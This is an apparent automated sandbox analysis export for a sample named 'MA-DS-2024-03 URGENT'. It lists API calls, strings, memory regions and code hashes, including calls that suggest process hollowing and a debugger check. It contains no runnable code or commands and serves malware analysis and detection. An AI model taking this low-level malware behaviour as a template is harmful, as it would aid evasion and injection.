                                                          • Part of subcall function 00404DDD: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,004C52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00404E0F
                                                        • _free.LIBCMT ref: 0043E263
                                                        • _free.LIBCMT ref: 0043E2AA
                                                          • Part of subcall function 00406A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00406BAD
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: _free$CurrentDirectoryLibraryLoad
                                                        • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                        • API String ID: 2861923089-1757145024
                                                        • Opcode ID: 8e336f0d69a657f93682824d12846feb57342a83311b056c997625f77a5515d3
                                                        • Instruction ID: bc1048028433ed9b22f3ef3a1c1c6008be5ef254c57e4e777beaa03c5b85f979
                                                        • Opcode Fuzzy Hash: 8e336f0d69a657f93682824d12846feb57342a83311b056c997625f77a5515d3
                                                        • Instruction Fuzzy Hash: 0D916E71901229AFCF04EFA6C8419EEB7B4FF08314F10446FE815AB2E1DB78A955CB59
                                                        APIs
                                                        • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,004035A1,SwapMouseButtons,00000004,?), ref: 004035D4
                                                        • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,004035A1,SwapMouseButtons,00000004,?,?,?,?,00402754), ref: 004035F5
                                                        • RegCloseKey.KERNEL32(00000000,?,?,004035A1,SwapMouseButtons,00000004,?,?,?,?,00402754), ref: 00403617
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: CloseOpenQueryValue
                                                        • String ID: Control Panel\Mouse
                                                        • API String ID: 3677997916-824357125
                                                        • Opcode ID: fddb709fe4a1b7e3bb6eda9662e0779279b58f522ad42de317fca39f37a0c6b5
                                                        • Instruction ID: b1ff216ba3ee978410a1c1c06e663b0c2c98cd46aaa17f39490786bf8a1b1252
                                                        • Opcode Fuzzy Hash: fddb709fe4a1b7e3bb6eda9662e0779279b58f522ad42de317fca39f37a0c6b5
                                                        • Instruction Fuzzy Hash: 84114871510208BFDB20CF64DC409AFBBBCEF45741F10486AE805E7250D6729E449768
                                                        APIs
                                                          • Part of subcall function 00404EE5: _fseek.LIBCMT ref: 00404EFD
                                                          • Part of subcall function 00469734: _wcscmp.LIBCMT ref: 00469824
                                                          • Part of subcall function 00469734: _wcscmp.LIBCMT ref: 00469837
                                                        • _free.LIBCMT ref: 004696A2
                                                        • _free.LIBCMT ref: 004696A9
                                                        • _free.LIBCMT ref: 00469714
                                                          • Part of subcall function 00422D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00429A24), ref: 00422D69
                                                          • Part of subcall function 00422D55: GetLastError.KERNEL32(00000000,?,00429A24), ref: 00422D7B
                                                        • _free.LIBCMT ref: 0046971C
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1286160805.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286297764.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286422161.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286451136.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286571859.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1286599776.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                        • String ID:
                                                        • API String ID: 1552873950-0
                                                        • Opcode ID: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
                                                        • Instruction ID: ca2eec8eb8578c2366e6fbf42eaf411172dd757ca1b938988fe54b4571807f9b
                                                        • Opcode Fuzzy Hash: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
                                                        • Instruction Fuzzy Hash: 88515EB1904219ABDF249F65DC81A9EBB79EF88304F1044AEF209A3241DB755E90CF59
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                        • String ID:
                                                        • API String ID: 2782032738-0
                                                        • Opcode ID: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                        • Instruction ID: 7e2b6cc7ad03bd9c76499a1e37937a2f988b0f8539bc111f38111bac958280d8
                                                        • Opcode Fuzzy Hash: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                        • Instruction Fuzzy Hash: 9341D434B006659BDB189F69E88096F7BA5EFC2364B50813FE82587640DB78DD418B48
                                                        APIs
                                                        • SetFilePointerEx.KERNEL32 ref: 0167B2BA
                                                        • WriteFile.KERNEL32(?,?,00000004,?,00000000), ref: 0167B2E0
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1287711947.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_1670000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: File$PointerWrite
                                                        • String ID:
                                                        • API String ID: 539440098-0
                                                        • Opcode ID: d887c29e45b482c1aaef1890db3604ee44a020c03872a26be473ed2a22b1bb7a
                                                        • Instruction ID: e94ba68c5c02bbbf6d31bdd264d6cd2fc06f2e03dbcd799bdaa26eb17adefcf5
                                                        • Opcode Fuzzy Hash: d887c29e45b482c1aaef1890db3604ee44a020c03872a26be473ed2a22b1bb7a
                                                        • Instruction Fuzzy Hash: E331A27050D384AEE7128B6D8C1973FBFE06F82625F48854DE9D4C7381D3B8844887A3
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: _memmove
                                                        • String ID: AU3!P/I$EA06
                                                        • API String ID: 4104443479-1914660620
                                                        • Opcode ID: 8014d3fb356ffbf6754ed2c01cea3d798000f8d72259ce0527afa311c47bbb91
                                                        • Instruction ID: ff6ab1fe0fa27ea81cbcababf34b5742e04188ff143208347500ec0318cc5285
                                                        • Opcode Fuzzy Hash: 8014d3fb356ffbf6754ed2c01cea3d798000f8d72259ce0527afa311c47bbb91
                                                        • Instruction Fuzzy Hash: F1418AB1A0415867DB219B6498517BF7BA19FC5304F28407BEE82BB3C2D63C5D4583AA
                                                        APIs
                                                        • _memset.LIBCMT ref: 0043EA39
                                                        • GetOpenFileNameW.COMDLG32(?), ref: 0043EA83
                                                          • Part of subcall function 00404750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00404743,?,?,004037AE,?), ref: 00404770
                                                          • Part of subcall function 00420791: GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 004207B0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: Name$Path$FileFullLongOpen_memset
                                                        • String ID: X
                                                        • API String ID: 3777226403-3081909835
                                                        • Opcode ID: f7a2dfced1c7fac4da1122c6cfde17308801e93c3a8658db5658365851755d62
                                                        • Instruction ID: baa1e7331fae4d359aac7897d23b5e8ce5a65ce190648e6f88e75d23560a4c0c
                                                        • Opcode Fuzzy Hash: f7a2dfced1c7fac4da1122c6cfde17308801e93c3a8658db5658365851755d62
                                                        • Instruction Fuzzy Hash: 4421A471A102589BCB41DF95D845BDE7BF8AF49314F00806FE508B7281DBB85989CFAA
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: __fread_nolock_memmove
                                                        • String ID: EA06
                                                        • API String ID: 1988441806-3962188686
                                                        • Opcode ID: 12b9eb2746c946ee24d761f12b33ae587f64773302ff2959e1666c5e9a364bcc
                                                        • Instruction ID: 3cd15271acb3b06ac884f373c06a49f445b450121f82016c471601618c020999
                                                        • Opcode Fuzzy Hash: 12b9eb2746c946ee24d761f12b33ae587f64773302ff2959e1666c5e9a364bcc
                                                        • Instruction Fuzzy Hash: 8F01F9719042287EDB18CAA9D816EFE7BFCDB11301F00459FF552D2181E878E6048764
                                                        APIs
                                                        • GetTempPathW.KERNEL32(00000104,?), ref: 004698F8
                                                        • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 0046990F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: Temp$FileNamePath
                                                        • String ID: aut
                                                        • API String ID: 3285503233-3010740371
                                                        • Opcode ID: d3e801ab242beb6fec4b4f89e1aaff04be832202f3ef9fc21f6b566375e79959
                                                        • Instruction ID: d76eb4abf93f0e171a782776cb2de2514a1bc3ee8d101bd4a6c1c3d5b9ef8161
                                                        • Opcode Fuzzy Hash: d3e801ab242beb6fec4b4f89e1aaff04be832202f3ef9fc21f6b566375e79959
                                                        • Instruction Fuzzy Hash: D0D05E7954030DABDB50ABA0DC0EFDA773CE704700F0006F5BA54D10A1EAB1A5988BA9
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e563156e91e36691d5f4fcac2aaf6be647dac8c86d34431775506fe1d7328f76
                                                        • Instruction ID: 208f182f3c9136cc863dec11eab3d0960db0a10b8073f2b3425ab1c058278d8f
                                                        • Opcode Fuzzy Hash: e563156e91e36691d5f4fcac2aaf6be647dac8c86d34431775506fe1d7328f76
                                                        • Instruction Fuzzy Hash: 8AF13A716083019FC714DF29C480A6ABBE5FF88318F54892EF8999B392D734E945CF86
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1287711947.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_1670000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: ComputerName
                                                        • String ID:
                                                        • API String ID: 3545744682-0
                                                        • Opcode ID: fd724e54bbd69018b0f5bb85d31e70a41374b4488c96890057e49639ec971c2c
                                                        • Instruction ID: de95f6c935edc8798486cdc71498178b4aea93fb6d26ed235554ece81ff126e1
                                                        • Opcode Fuzzy Hash: fd724e54bbd69018b0f5bb85d31e70a41374b4488c96890057e49639ec971c2c
                                                        • Instruction Fuzzy Hash: 8C2125336693442BEF36561C8C05BB93E3D6F92B10F88848DF68957392D364650CCEA7
                                                        APIs
                                                        • _memset.LIBCMT ref: 00404370
                                                        • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00404415
                                                        • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00404432
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: IconNotifyShell_$_memset
                                                        • String ID:
                                                        • API String ID: 1505330794-0
                                                        • Opcode ID: 55e578eaf81f1082cb721cb8179a93cbba9ea3621e04278649df261dfa9eaab8
                                                        • Instruction ID: 448a70bf35e4549ae47872dc9eb977fea889799f7ce089bf6dae1479d4278b9a
                                                        • Opcode Fuzzy Hash: 55e578eaf81f1082cb721cb8179a93cbba9ea3621e04278649df261dfa9eaab8
                                                        • Instruction Fuzzy Hash: 4E3184B05047019FD760DF24D884A9BBBF8FB98308F00093FEA9A92391D7746944CB5A
                                                        APIs
                                                        • __FF_MSGBANNER.LIBCMT ref: 00425733
                                                          • Part of subcall function 0042A16B: __NMSG_WRITE.LIBCMT ref: 0042A192
                                                          • Part of subcall function 0042A16B: __NMSG_WRITE.LIBCMT ref: 0042A19C
                                                        • __NMSG_WRITE.LIBCMT ref: 0042573A
                                                          • Part of subcall function 0042A1C8: GetModuleFileNameW.KERNEL32(00000000,004C33BA,00000104,00000000,00000001,00000000), ref: 0042A25A
                                                          • Part of subcall function 0042A1C8: ___crtMessageBoxW.LIBCMT ref: 0042A308
                                                          • Part of subcall function 0042309F: ___crtCorExitProcess.LIBCMT ref: 004230A5
                                                          • Part of subcall function 0042309F: ExitProcess.KERNEL32 ref: 004230AE
                                                          • Part of subcall function 00428B28: __getptd_noexit.LIBCMT ref: 00428B28
                                                        • RtlAllocateHeap.NTDLL(00A60000,00000000,00000001,?,00000000,00000001,?,00420DD3,?,00000000,%I,?,00409E8C,?,?,?), ref: 0042575F
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                        • String ID:
                                                        • API String ID: 1372826849-0
                                                        • Opcode ID: 173bc1eb0939af60788e3920f729a181213a4711687b08a62f5fb4dd74449d1b
                                                        • Instruction ID: 12628286b9c33790f0bcaf27d243d0f78d5a939af01e39ac9af769d2403f214a
                                                        • Opcode Fuzzy Hash: 173bc1eb0939af60788e3920f729a181213a4711687b08a62f5fb4dd74449d1b
                                                        • Instruction Fuzzy Hash: 8101D235380B31DADA102B36BC42A2E67588BC2766FD0043FF9059A281DE7C9D01866D
                                                        APIs
                                                        • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00469548,?,?,?,?,?,00000004), ref: 004698BB
                                                        • SetFileTime.KERNEL32(00000000,?,00000000,?,?,00469548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 004698D1
                                                        • CloseHandle.KERNEL32(00000000,?,00469548,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 004698D8
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: File$CloseCreateHandleTime
                                                        • String ID:
                                                        • API String ID: 3397143404-0
                                                        APIs
                                                        • _free.LIBCMT ref: 00468D1B
                                                          • Part of subcall function 00422D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00429A24), ref: 00422D69
                                                          • Part of subcall function 00422D55: GetLastError.KERNEL32(00000000,?,00429A24), ref: 00422D7B
                                                        • _free.LIBCMT ref: 00468D2C
                                                        • _free.LIBCMT ref: 00468D3E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: _free$ErrorFreeHeapLast
                                                        • String ID:
                                                        • API String ID: 776569668-0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: CALL
                                                        • API String ID: 0-4196123274
                                                        APIs
                                                        • _memmove.LIBCMT ref: 00466331
                                                        • _memmove.LIBCMT ref: 0046634F
                                                          • Part of subcall function 004664B8: _memmove.LIBCMT ref: 00466546
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: _memmove
                                                        • String ID:
                                                        • API String ID: 4104443479-0
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: _memmove
                                                        • String ID:
                                                        • API String ID: 4104443479-0
                                                        APIs
                                                        • CreateThread.KERNEL32(00000000,00000000,016755C0,?,00000000,00000000), ref: 01675A51
                                                        • RtlExitUserThread.NTDLL(00000000), ref: 01675B11
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1287711947.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_1670000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: Thread$CreateExitUser
                                                        • String ID:
                                                        • API String ID: 4108186749-0
                                                        APIs
                                                        • IsThemeActive.UXTHEME ref: 00404834
                                                          • Part of subcall function 0042336C: __lock.LIBCMT ref: 00423372
                                                          • Part of subcall function 0042336C: DecodePointer.KERNEL32(00000001,?,00404849,00457C74), ref: 0042337E
                                                          • Part of subcall function 0042336C: EncodePointer.KERNEL32(?,?,00404849,00457C74), ref: 00423389
                                                          • Part of subcall function 004048FD: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00404915
                                                          • Part of subcall function 004048FD: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0040492A
                                                          • Part of subcall function 00403B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00403B68
                                                          • Part of subcall function 00403B3A: IsDebuggerPresent.KERNEL32 ref: 00403B7A
                                                          • Part of subcall function 00403B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,004C52F8,004C52E0,?,?), ref: 00403BEB
                                                          • Part of subcall function 00403B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 00403C6F
                                                        • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00404874
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                        • String ID:
                                                        • API String ID: 1438897964-0
                                                        APIs
                                                        • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000,?,00405821,?,?,?,?), ref: 00405CC7
                                                        • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,00000000,?,00405821,?,?,?,?), ref: 0043DD73
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        APIs
                                                          • Part of subcall function 0042571C: __FF_MSGBANNER.LIBCMT ref: 00425733
                                                          • Part of subcall function 0042571C: __NMSG_WRITE.LIBCMT ref: 0042573A
                                                          • Part of subcall function 0042571C: RtlAllocateHeap.NTDLL(00A60000,00000000,00000001,?,00000000,00000001,?,00420DD3,?,00000000,%I,?,00409E8C,?,?,?), ref: 0042575F
                                                        • std::exception::exception.LIBCMT ref: 00420DEC
                                                        • __CxxThrowException@8.LIBCMT ref: 00420E01
                                                          • Part of subcall function 0042859B: RaiseException.KERNEL32(?,?,00000000,004B9E78,?,00000001,?,?,?,00420E06,00000000,004B9E78,00409E8C,00000001), ref: 004285F0
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                        • String ID:
                                                        • API String ID: 3902256705-0
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: __lock_file_memset
                                                        • String ID:
                                                        • API String ID: 26237723-0
                                                        APIs
                                                          • Part of subcall function 00428B28: __getptd_noexit.LIBCMT ref: 00428B28
                                                        • __lock_file.LIBCMT ref: 004253EB
                                                          • Part of subcall function 00426C11: __lock.LIBCMT ref: 00426C34
                                                        • __fclose_nolock.LIBCMT ref: 004253F6
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                        • String ID:
                                                        • API String ID: 2800547568-0
                                                        APIs
                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001,00000000,00000000,?,?,?,0040542F,?,?,?,?,?), ref: 0040807A
                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001,00000000,?,?,?,0040542F,?,?,?,?,?), ref: 004080AD
                                                          • Part of subcall function 0040774D: _memmove.LIBCMT ref: 00407789
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1286191333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: ByteCharMultiWide$_memmove
                                                        • String ID:
                                                        • API String ID: 3033907384-0
                                                        • Opcode ID: 9fc4be26d96f23e2fd3dec38f1207a0408a4a6382bde92808a88b76bec9bec88
                                                        • Instruction ID: be71039b59a243880f73e1074d907fcebe79c3230fd69eb509900504ef28c21c
                                                        • Opcode Fuzzy Hash: 9fc4be26d96f23e2fd3dec38f1207a0408a4a6382bde92808a88b76bec9bec88
                                                        • Instruction Fuzzy Hash: C9018F31201114BEEB246B22DD4AF7B3B6DEF85360F10803EF905DE2D1DE34A8009679
                                                        APIs
                                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 01675D6D
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1287711947.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_1670000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: FreeVirtual
                                                        • String ID:
                                                        • API String ID: 1263568516-0
                                                        • Opcode ID: b3664c5737ee39714e2ea097c43f58ae7bc6537a146aecc441d8b0e909573902
                                                        • Instruction ID: 8d74d54f4958a19792173b3c8d6ac6af7e6896c68efa9d9096939804b8b1979f
                                                        • Opcode Fuzzy Hash: b3664c5737ee39714e2ea097c43f58ae7bc6537a146aecc441d8b0e909573902
                                                        • Instruction Fuzzy Hash: 85F0B453E04340EAEA7F03ACED8DB713E10E7016A9F0C50C9A3435A3A397555857C60D
                                                        APIs
                                                        • CreateProcessW.KERNEL32(?,00000000), ref: 00B64A23
                                                        • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00B64AB9
                                                        • ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00B64ADB
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1287269734.0000000000B62000.00000040.00000020.00020000.00000000.sdmp, Offset: 00B62000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_b62000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                        • String ID:
                                                        • API String ID: 2438371351-0
                                                        • Opcode ID: 45c0bcdfd50c24934144be52d4489c8f4aeee23b26077383fd0484b0fd6f3e51
                                                        • Instruction ID: 381bdfb5fe8a87baa974416e7910c299cd8a34b09f00ce3439d47ef3f4e03585
                                                        • Opcode Fuzzy Hash: 45c0bcdfd50c24934144be52d4489c8f4aeee23b26077383fd0484b0fd6f3e51
                                                        • Instruction Fuzzy Hash: D112CE24E24658C6EB24DF64D8507DEB272FF68300F1090E9910DEB7A5E77A4F81CB5A
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1287711947.0000000001670000.00000040.00001000.00020000.00000000.sdmp, Offset: 01670000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_1670000_MA-DS-2024-03 URGENT.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 41f040c5c96e993f02081a65f14c53ac652d498761ef1d58b5b29f058d996586
                                                        • Instruction ID: 84363f1a5db9a7dd7a14e425c9d70ed7f3f0ecded37441ecc1a1cd766f5ea901
                                                        • Opcode Fuzzy Hash: 41f040c5c96e993f02081a65f14c53ac652d498761ef1d58b5b29f058d996586
